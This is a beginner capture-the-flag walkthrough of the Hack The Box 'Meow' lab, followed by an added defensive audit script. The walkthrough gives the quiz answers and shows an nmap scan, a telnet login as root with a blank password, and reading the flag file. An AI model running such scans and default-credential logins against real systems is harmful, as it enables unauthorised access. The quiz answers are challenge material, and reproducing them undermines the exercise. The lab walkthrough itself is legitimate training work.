The aim of this walkthrough is to provide help with the Meow machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 0 challenges.
SETUP
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.
TASK 1
Question: What does the acronym VM stand for?
A simple internet search should suffice for this task.
virtual machine
TASK 2
Question: What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.
Same as before, use the internet.
terminal
TASK 3
Question: What service do we use to form our VPN connection into HTB labs?
There are multiple documents on the Hack The Box website describing the various ways you can connect to the target machine.
openvpn
TASK 4
Question: What is the abbreviated name for a ‘tunnel interface’ in the output of your VPN boot-up sequence output?
One way to figure that out is to list all your network interfaces. You could do this with the ifconfig command.
tun
TASK 5
Question: What tool do we use to test our connection to the target with an ICMP echo request?
A quick search on the internet should get you the answer.
ping
TASK 6
Question: What is the name of the most common tool for finding open ports on a target?
Just like in the previous task, use the internet.
nmap
TASK 7
Question: What service do we identify on port 23/tcp during our scans?
Simply use nmap to scan the top 1000 ports on the target machine.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $nmap 10.129.30.251
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 09:06 BST
Nmap scan report for 10.129.30.251
Host is up (0.064s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
23/tcp open telnet
Nmap done: 1 IP address (1 host up) scanned in 0.80 seconds
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
Only one port seems to be open:
telnet
TASK 8
Question: What username is able to log into the target over telnet with a blank password?
We can use the telnet command to connect to the service. Once connected, try out some common username:password pairs.
The first I tried, user:password, was a bust, but for the second, root:root, I did not even have to provide the password.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $telnet 10.129.30.251 23
Trying 10.129.30.251...
Connected to 10.129.30.251.
Escape character is '^]'.
█ █ ▐▌ ▄█▄ █ ▄▄▄▄
█▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀
█ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█ ▀▄▄▀ █▀█
Meow login: user
Password:
Login incorrect
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 04 May 2023 08:16:35 AM UTC
System load: 0.0
Usage of /: 41.7% of 7.75GB
Memory usage: 4%
Swap usage: 0%
Processes: 138
Users logged in: 0
IPv4 address for eth0: 10.129.30.251
IPv6 address for eth0: dead:beef::250:56ff:fe96:247c
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu May 4 08:15:52 UTC 2023 on pts/0
root@Meow:~#
root
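Seen from the administrator's side, Task 8 works because two things are true at once: telnet is listening and an account has no password. The following check is an added example, not part of the original walkthrough; it assumes the blank-password login comes from an empty password field in a shadow-format file, and the function names and sample data are constructed.

```shell
# Added example (not from the walkthrough): check a host for the two conditions
# that made Task 8 possible. File names and sample data below are constructed.

# Login names whose password field (2nd field, shadow format) is empty.
# Empty means no password is set; "*" or "!" means the account is locked.
empty_password_accounts() {
    awk -F: 'NF >= 2 && $2 == "" { print $1 }' "$1" | paste -sd, -
}

# Reads `ss -ltn` output on stdin; succeeds if a socket listens on TCP port 23.
telnet_listening() {
    awk '$1 == "LISTEN" && $4 ~ /:23$/ { found = 1 } END { exit !found }'
}

# $1 = shadow-format file, $2 = file with saved `ss -ltn` output.
audit() {
    accounts=$(empty_password_accounts "$1")
    if telnet_listening < "$2"; then telnet=open; else telnet=closed; fi
    if [ "$telnet" = open ] && [ -n "$accounts" ]; then
        echo "CRITICAL telnet=$telnet empty_password=$accounts"
    elif [ "$telnet" = open ] || [ -n "$accounts" ]; then
        echo "WARN telnet=$telnet empty_password=${accounts:-none}"
    else
        echo "OK telnet=$telnet empty_password=none"
    fi
}

# Constructed sample: a host configured like the target in this walkthrough.
tmp=$(mktemp -d)
cat > "$tmp/shadow.weak" <<'EOF'
root::18795:0:99999:7:::
daemon:*:18795:0:99999:7:::
alice:$6$constructedsalt$constructedhash:18795:0:99999:7:::
EOF
cat > "$tmp/ss.weak" <<'EOF'
State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128          0.0.0.0:23        0.0.0.0:*
EOF

# Constructed sample: the same host after locking root and removing telnet.
sed 's/^root::/root:!:/' "$tmp/shadow.weak" > "$tmp/shadow.fixed"
cat > "$tmp/ss.fixed" <<'EOF'
State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128          0.0.0.0:22        0.0.0.0:*
LISTEN 0      128          0.0.0.0:8023      0.0.0.0:*
EOF

audit "$tmp/shadow.weak" "$tmp/ss.weak"
audit "$tmp/shadow.fixed" "$tmp/ss.fixed"
```

On a real host the same functions can be pointed at /etc/shadow (as root) and at a saved copy of the ss -ltn output.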
SUBMIT FLAG
Question: Submit root flag
Once we are logged in via telnet, we find ourselves with root privileges and in the root home directory.
Simply listing all the files in the directory will reveal the flag. Grab it to continue.
root@Meow:~# ll
total 36
drwx------ 5 root root 4096 Jun 18 2021 ./
drwxr-xr-x 20 root root 4096 Jul 7 2021 ../
lrwxrwxrwx 1 root root 9 Jun 4 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3132 Oct 6 2020 .bashrc
drwx------ 2 root root 4096 Apr 21 2021 .cache/
-rw-r--r-- 1 root root 33 Jun 17 2021 flag.txt
drwxr-xr-x 3 root root 4096 Apr 21 2021 .local/
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 75 Mar 26 2021 .selected_editor
drwxr-xr-x 3 root root 4096 Apr 21 2021 snap/
root@Meow:~# cat flag.txt
<flag>
root@Meow:~#
flag
Make sure to terminate the target box before you continue with the next machine!